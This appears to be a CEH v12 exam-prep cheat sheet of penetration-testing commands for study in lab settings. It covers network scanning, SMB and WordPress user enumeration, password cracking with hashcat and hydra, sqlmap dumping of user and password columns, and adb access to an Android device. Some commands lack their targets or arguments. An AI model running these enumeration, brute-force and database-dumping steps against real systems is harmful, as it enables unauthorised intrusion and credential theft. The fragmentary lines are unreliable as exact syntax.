CEH v12 practical resources
Last updated
Read all questions carefully
Enumerate sub-net
nmap -sn IP | tee nmap_ping_sweep.txt
Enumerate ports
nmap -A -p- -v -iL ip_list.txt | tee nmap_port_scan.txt
Snow - Steganography
OpenStego
CrypTool
BCTextEncoder
How many machines are active in a network - netdiscover -r 192.168.1.0/24
mstsc
-o output
-S wordlist
gobuster dir -u 10.10.10.10 -w /usr/share/dirb/wordlists/common.txt -x .txt
OR
FTP Login - ftp <ip>
get <file name> (to get file from FTP login)
SSH Login - ssh username@10.10.10.10
nmap -A 10.10.10.10 (aggressive scan - Traceroute, T4, OS)
nmap -sC (service scan)
nmap -sV (version scan)
nmap -sP 10.10.10.10/24 (how many hosts are up in the whole network)/ping scan
nmap -sL (hostnames)
nmap -oN <filename> (to save output in a file)
nmap -F (fast scan)
nmap -O (os scan)
hashid -m <hash> (to identify the type of hash, its mode etc)
hashcat -m <mode> -a 0 <hash> /usr/share/wordlists/rockyou.txt
crackstation
Cyberchef
Global network inventory
Netbios enumerator
Hyena
Superscan
Advanced ip scanner
nmap --script smb-os-discovery.nse -p445 <ip> (enumerate os, domain name,etc)
nmap --script smb-enum-users.nse -p445 <ip> (used to enumerate all users on remote Windows system using SAMR enumeration and LSA bruteforcing)
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.19.21 (smb users and shares)
smbclient //10.10.19.21/anonymous (accessing smb shares)
smbget -R smb://10.10.19.21/anonymous (downloading smb files)
Enum4linux
enum4linux -u martin -p apple -U 10.10.10.12 (-u user, -p pass, -U get user list)
enum4linux -u martin -p apple -o 10.10.10.12 (-o get OS info)
enum4linux -u martin -p apple -P 10.10.10.12 (-P get password policy info)
enum4linux -u martin -p apple -G 10.10.10.12 (-G get groups and members info)
enum4linux -u martin -p apple -S 10.10.10.12 (-S get share list info)
enum4linux -u martin -p apple -a 10.10.10.12 (-a get all simple enumeration data [-U -S -G -P -r -o -n -i])
wpscan --url http://[IP Address]:8080/CEH --enumerate u (enumerate the usernames stored in the website’s database)
Hashcalc
Md5 calculator
CrypTool – decode .hex file
BCTextEncoder – decrypt text using secret key
VeraCrypt – anything related to volume
Steganography-
steghide embed -ef <filename> -cf <image> -p <passphrase>
steghide extract -sf <image> (extract hidden data from image)
stegcracker <image> /usr/share/wordlists/rockyou.txt (crack the passphrase of image)
sha256sum <filename> (find hash of the file)
via USB
./adb tcpip 5555
./adb connect 192.168.43.117:5555
./adb devices
./adb -d shell (Direct an adb command to the only attached USB device)
ls
cd sdcard
ls
cd dcim
cd camera
ls
< pc location > <android location>
./adb pull /sdcard/Download/magisk_patched.img C:\platform-tools (from android to pc)
< android location > <pc location>
(for cookies- console->document.cookie)
(dump whole table)
OR
(dump individual column data)
skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl
uniscan -u -q (for directories)
uniscan -u -we (enable file check like robots.txt and sitemap.xml)
get
nikto -h -Tuning 1
hydra -L username -P /usr/share/wordlists/rockyou.txt
Crack hashes- , cyberchef
(online steganography tool)
./adb push C:\platform-tools\ /sdcard/Download (from pc to android)
site: php?= (for finding vulnerable site)
sqlmap -u --dbs (databases)
sqlmap -u -D acuart --tables (tables)
sqlmap -u -D acuart -T users --columns (columns)
sqlmap -u -D acuart -T users --dump
sqlmap -u -D acuart -T users -C uname --dump
sqlmap -u -D acuart -T users -C pass --dump